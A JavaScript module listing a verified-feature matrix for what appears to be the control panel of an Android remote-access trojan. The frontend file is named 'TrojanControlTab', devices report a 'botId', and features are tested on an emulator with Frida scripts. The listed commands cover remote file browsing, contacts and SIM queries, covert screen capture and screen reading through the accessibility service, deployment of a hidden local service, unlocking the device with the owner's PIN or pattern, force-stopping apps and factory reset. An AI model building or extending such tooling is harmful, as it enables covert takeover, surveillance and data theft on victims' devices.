'use strict';

// This is the evidence-backed subset. Entries are intentionally explicit so a
// feature cannot be marked verified merely because a command was acknowledged.
const FREE_FEATURE_MATRIX = Object.freeze([
  {
    featureId: 'app-list',
    uiSource: 'frontend-react/src/pages/ControlPage.jsx:587',
    frontendCommand: 'GET_APP_LIST',
    frontendParams: {},
    channel: 'main-ws',
    freeCommand: 'GET_APP_LIST',
    payloadTransform: 'command/params -> command/payload/cmdId',
    responseTypes: ['cmd_ack', 'app_list_response'],
    responseTransform: 'command_result(acknowledged) + app_list(files unchanged)',
    successEvidence: 'MuMu returned app_list_response with apps; DB cache and frontend path passed',
    failureEvidence: 'cmd_error/error or no final app_list_response',
    prerequisites: 'Free /w connected',
    originalCompatibility: 'preserved',
    automatedTest: 'freeSocketIoCompat.integration.js',
    runtimeTest: 'frida_verify_free_readonly.js: GET_APP_LIST',
    status: 'verified',
  },
  {
    featureId: 'device-state',
    uiSource: 'frontend-react/src/pages/ControlPage.jsx:connectWs',
    frontendCommand: 'GET_DEVICE_STATE',
    frontendParams: {},
    channel: 'main-ws',
    freeCommand: 'GET_DEVICE_STATE',
    payloadTransform: 'identity',
    responseTypes: ['cmd_ack', 'status'],
    responseTransform: 'status is normalized to existing device fields',
    successEvidence: 'MuMu returned status with inputBlocked, screen, charging, botId and battery fields',
    failureEvidence: 'cmd_error/error or no status',
    prerequisites: 'Free /w connected',
    originalCompatibility: 'preserved',
    automatedTest: 'freeCommandCompat.test.js',
    runtimeTest: 'frida_verify_free_readonly.js: GET_DEVICE_STATE',
    status: 'verified',
  },
  {
    featureId: 'permissions',
    uiSource: 'frontend-react/src/components/control/PermissionTab.jsx:34',
    frontendCommand: 'GET_PERMISSIONS',
    frontendParams: {},
    channel: 'main-ws',
    freeCommand: 'GET_PERMISSIONS',
    payloadTransform: 'identity',
    responseTypes: ['cmd_ack', 'permissions_response'],
    responseTransform: 'permissions_response is already consumed by frontend',
    successEvidence: 'MuMu returned permissions_response with 13 permission keys',
    failureEvidence: 'cmd_error/error or no permissions_response',
    prerequisites: 'Free /w connected',
    originalCompatibility: 'preserved',
    automatedTest: 'freeSocketIoCompat.test.js',
    runtimeTest: 'frida_verify_free_readonly.js: GET_PERMISSIONS',
    status: 'verified',
  },
  {
    featureId: 'file-list',
    uiSource: 'frontend-react/src/pages/ControlPage.jsx:533',
    frontendCommand: 'FILE_LIST',
    frontendParams: '{ path }',
    channel: 'main-ws',
    freeCommand: 'FILE_LIST',
    payloadTransform: 'identity; file_response.files normalized with isDir/type/fullPath',
    responseTypes: ['cmd_ack', 'file_response'],
    responseTransform: 'file_response(files) -> file_list',
    successEvidence: 'MuMu returned 24 entries for /sdcard',
    failureEvidence: 'cmd_error/error or no files array',
    prerequisites: 'storage permission',
    originalCompatibility: 'preserved',
    automatedTest: 'freeCommandCompat.test.js',
    runtimeTest: 'frida_verify_free_readonly.js: FILE_LIST',
    status: 'verified',
  },
  {
    featureId: 'file-storage-info',
    uiSource: 'frontend-react/src/pages/ControlPage.jsx:file-manager',
    frontendCommand: 'FILE_STORAGE_INFO',
    frontendParams: {},
    channel: 'main-ws',
    freeCommand: 'FILE_STORAGE_INFO',
    payloadTransform: 'identity',
    responseTypes: ['cmd_ack', 'file_response'],
    responseTransform: 'file_response(total/free/used) -> file_storage_info',
    successEvidence: 'MuMu returned total/free/used byte and formatted fields',
    failureEvidence: 'cmd_error/error or missing storage fields',
    prerequisites: 'storage permission',
    originalCompatibility: 'preserved',
    automatedTest: 'freeCommandCompat.test.js',
    runtimeTest: 'frida_verify_free_readonly.js: FILE_STORAGE_INFO',
    status: 'verified',
  },
  {
    featureId: 'contacts-stats',
    uiSource: 'frontend-react/src/pages/ControlPage.jsx:contacts',
    frontendCommand: 'CONTACTS_STATS',
    frontendParams: {},
    channel: 'main-ws',
    freeCommand: 'CONTACTS_STATS',
    payloadTransform: 'identity',
    responseTypes: ['cmd_ack', 'contacts_stats'],
    responseTransform: 'identity',
    successEvidence: 'MuMu returned hasPermission=false,totalCount=0',
    failureEvidence: 'cmd_error/error or no contacts_stats',
    prerequisites: 'contacts permission for non-empty data',
    originalCompatibility: 'preserved',
    automatedTest: 'freeCommandCompat.test.js',
    runtimeTest: 'frida_verify_free_readonly.js: CONTACTS_STATS',
    status: 'verified',
  },
  {
    featureId: 'dual-sim-status',
    uiSource: 'frontend-react/src/pages/ControlPage.jsx:sms',
    frontendCommand: 'SMS_GET_DUAL_SIM_STATUS',
    frontendParams: {},
    channel: 'main-ws',
    freeCommand: 'SMS_GET_DUAL_SIM_STATUS',
    payloadTransform: 'identity',
    responseTypes: ['cmd_ack', 'dual_sim_status'],
    responseTransform: 'identity',
    successEvidence: 'MuMu returned isDualSim=false',
    failureEvidence: 'cmd_error/error or no dual_sim_status',
    prerequisites: 'none; SIM hardware still requires real device validation',
    originalCompatibility: 'preserved',
    automatedTest: 'freeCommandCompat.test.js',
    runtimeTest: 'frida_verify_free_readonly.js: SMS_GET_DUAL_SIM_STATUS',
    status: 'verified',
  },
  {
    featureId: 'accessibility-check',
    uiSource: 'frontend-react/src/components/control/TrojanControlTab.jsx',
    frontendCommand: 'CHECK_ACCESSIBILITY',
    frontendParams: {},
    channel: 'main-ws',
    freeCommand: 'CHECK_ACCESSIBILITY',
    payloadTransform: 'identity',
    responseTypes: ['cmd_ack', 'side_panel_result'],
    responseTransform: 'side_panel_result must be forwarded unchanged',
    successEvidence: 'MuMu returned explicit success=false,response=dxs not deployed',
    failureEvidence: 'missing side_panel_result',
    prerequisites: 'DXS deployed for success=true',
    originalCompatibility: 'preserved',
    automatedTest: 'freeCommandCompat.test.js',
    runtimeTest: 'frida_verify_free_readonly.js: CHECK_ACCESSIBILITY',
    status: 'verified',
  },
  {
    featureId: 'ui-hierarchy',
    uiSource: 'frontend-react/src/pages/ControlPage.jsx:1008',
    frontendCommand: 'GET_UI_HIERARCHY',
    frontendParams: '{ maxDepth }',
    channel: 'main-ws',
    freeCommand: 'GET_UI_HIERARCHY',
    payloadTransform: 'identity',
    responseTypes: ['cmd_ack', 'ui_hierarchy/accessibility_data'],
    responseTransform: 'not established',
    successEvidence: 'none; handler returns Unit and only ACK observed',
    failureEvidence: 'only ACK with no final hierarchy',
    prerequisites: 'Free UI handler must produce context.eum result',
    originalCompatibility: 'preserved',
    automatedTest: 'freeCommandCompat.test.js',
    runtimeTest: 'frida_verify_free_ui_hierarchy.js + frida_trace_free_ui_handler.js',
    status: 'implemented',
  },
  {
    featureId: 'accessibility-screen',
    uiSource: 'frontend-react/src/pages/ControlPage.jsx:startScreen',
    frontendCommand: 'SCREEN_CAPTURE_SET_TECH + SCREEN_CAPTURE_RESUME',
    frontendParams: '{ tech: mediaprojection|accessibility }',
    channel: 'main-ws',
    freeCommand: 'SCREEN_CAPTURE_SET_TECH / SCREEN_CAPTURE_RESUME',
    payloadTransform: 'main WS command envelope; no ADB fallback',
    responseTypes: ['cmd_ack', 'screen/frame binary'],
    responseTransform: 'binary frame -> screenSrc; offline keeps empty window without polling',
    successEvidence: 'Frontend route and Free command aliases are covered by compatibility tests',
    failureEvidence: 'no frame or cmd_error; device action requires accessibility service',
    prerequisites: 'accessibilityAvailable',
    originalCompatibility: 'preserved',
    automatedTest: 'capabilityRouting.test.js + freeSocketIoCompat.test.js',
    runtimeTest: 'not replayed on a live device in this round',
    status: 'contract-tested',
  },
  {
    featureId: 'accessibility-reader',
    uiSource: 'frontend-react/src/pages/ControlPage.jsx:requestReaderData',
    frontendCommand: 'GET_UI_HIERARCHY',
    frontendParams: '{ maxDepth: 25 }',
    channel: 'main-ws',
    freeCommand: 'GET_UI_HIERARCHY',
    payloadTransform: 'identity; reader accepts reader_data/accessibility_data/ui_hierarchy',
    responseTypes: ['cmd_ack', 'ui_hierarchy/accessibility_data/reader_data'],
    responseTransform: 'hierarchy payload -> ReaderView; no ADB fallback',
    successEvidence: 'Frontend consumes all known hierarchy event names',
    failureEvidence: 'ACK without hierarchy leaves reader waiting/empty',
    prerequisites: 'accessibilityAvailable',
    originalCompatibility: 'preserved',
    automatedTest: 'freeSocketIoCompat.test.js',
    runtimeTest: 'frida_verify_free_ui_hierarchy.js',
    status: 'implemented',
  },
  {
    featureId: 'adb-deploy',
    uiSource: 'frontend-react/src/components/control/TrojanControlTab.jsx:deploy',
    frontendCommand: 'FULL_DEPLOY',
    frontendParams: '{}',
    channel: 'main-ws -> Bridge/local-service',
    freeCommand: 'FULL_DEPLOY',
    payloadTransform: 'only sent when accessibilityAvailable && !adbAvailable',
    responseTypes: ['cmd_ack', 'full_deploy_started', 'full_deploy_failed', 'bridge_connected'],
    responseTransform: 'only bridge_connected establishes adbAvailable; ACK/start is not success',
    successEvidence: 'routing tests cover prerequisite and independent post-deploy state',
    failureEvidence: 'MuMu returned full_deploy_failed; dxsRunning remained false',
    prerequisites: 'accessibilityAvailable; Free DXS runtime',
    originalCompatibility: 'preserved',
    automatedTest: 'capabilityRouting.test.js + freeSocketIoCompat.test.js',
    runtimeTest: 'frida_deploy_free_local_service.js',
    status: 'blocked',
  },
  {
    featureId: 'adb-screen-reader-control',
    uiSource: 'frontend-react/src/components/control/TrojanControlTab.jsx:sendTunnelInput',
    frontendCommand: 'screenshot/minicap/stream + shell + input actions',
    frontendParams: '{ deviceId, action|cmd, params }',
    channel: 'local-http/Bridge',
    freeCommand: 'local-service endpoints',
    payloadTransform: 'inputText->input; uninstall->uninstallApp; package/path aliases retained',
    responseTypes: ['HTTP success/error', 'Bridge command_result', 'screen frame'],
    responseTransform: 'final HTTP/Bridge result controls UI; offline opens empty window without polling',
    successEvidence: 'local-service request contract 8/8; endpoint mapping tests pass',
    failureEvidence: 'MuMu has no running DXS/local-service process or reachable tunnel',
    prerequisites: 'adbAvailable / bridge_connected',
    originalCompatibility: 'preserved',
    automatedTest: 'freeLocalServiceCompat.test.js + verify_local_service_request_contract.php',
    runtimeTest: 'frida_deploy_free_local_service.js',
    status: 'contract-tested',
  },
  {
    featureId: 'adb-unlock',
    uiSource: 'frontend-react/src/components/control/TrojanControlTab.jsx:enterCipher',
    frontendCommand: 'enterCipher',
    frontendParams: '{ cipher, type? }',
    channel: 'local-http',
    freeCommand: '/enterCipher',
    payloadTransform: 'pattern adds type=pattern; cipher preserved',
    responseTypes: ['HTTP success/error'],
    responseTransform: 'final HTTP response only; no ACK-as-success',
    successEvidence: 'PHP request construction and parameter contract covered',
    failureEvidence: 'no live local-service deployment in current MuMu run',
    prerequisites: 'adbAvailable / local-service',
    originalCompatibility: 'preserved',
    automatedTest: 'freeLocalServiceCompat.test.js + verify_local_service_request_contract.php',
    runtimeTest: 'not device-verified',
    status: 'blocked',
  },
  {
    featureId: 'accessibility-unlock',
    uiSource: 'frontend-react/src/pages/ControlPage.jsx:submitAccessibilityUnlock',
    frontendCommand: 'SMART_NUMERIC_UNLOCK / SMART_MIXED_UNLOCK / UNLOCK_DEVICE',
    frontendParams: '{ password|pattern, screenWidth, screenHeight }',
    channel: 'main-ws',
    freeCommand: 'SMART_NUMERIC_UNLOCK / SMART_MIXED_UNLOCK / UNLOCK_DEVICE',
    payloadTransform: 'numeric/mixed/password and pattern are explicitly split',
    responseTypes: ['cmd_ack', 'smart_unlock_result'],
    responseTransform: 'success is read only from smart_unlock_result.success',
    successEvidence: 'Free handler mapping and frontend final-result consumer are tested',
    failureEvidence: 'current runtime round did not capture complete device unlock result',
    prerequisites: 'accessibilityAvailable; real lock screen for action verification',
    originalCompatibility: 'preserved',
    automatedTest: 'freeCommandCompat.test.js',
    runtimeTest: 'frida_verify_free_unlock_device.js',
    status: 'contract-tested',
  },
  {
    featureId: 'factory-reset-force-stop',
    uiSource: 'frontend-react/src/pages/ControlPage.jsx:sendLocalServiceAction',
    frontendCommand: 'factoryReset / forceStopApp',
    frontendParams: '{ packageName? }',
    channel: 'local-http',
    freeCommand: '/factoryReset / /forceStopApp',
    payloadTransform: 'forceStopApp packageName<->package; factoryReset empty POST body',
    responseTypes: ['HTTP success/error'],
    responseTransform: 'frontend displays only final HTTP result',
    successEvidence: 'PHP local-service contract 8/8',
    failureEvidence: 'blocked until DXS/local-service is actually deployed',
    prerequisites: 'adbAvailable / local-service',
    originalCompatibility: 'preserved',
    automatedTest: 'verify_local_service_request_contract.php',
    runtimeTest: 'not device-verified',
    status: 'contract-tested',
  },
]);

function getFreeFeatureMatrix() {
  return FREE_FEATURE_MATRIX.map((entry) => ({ ...entry, responseTypes: [...entry.responseTypes] }));
}

module.exports = { FREE_FEATURE_MATRIX, getFreeFeatureMatrix };
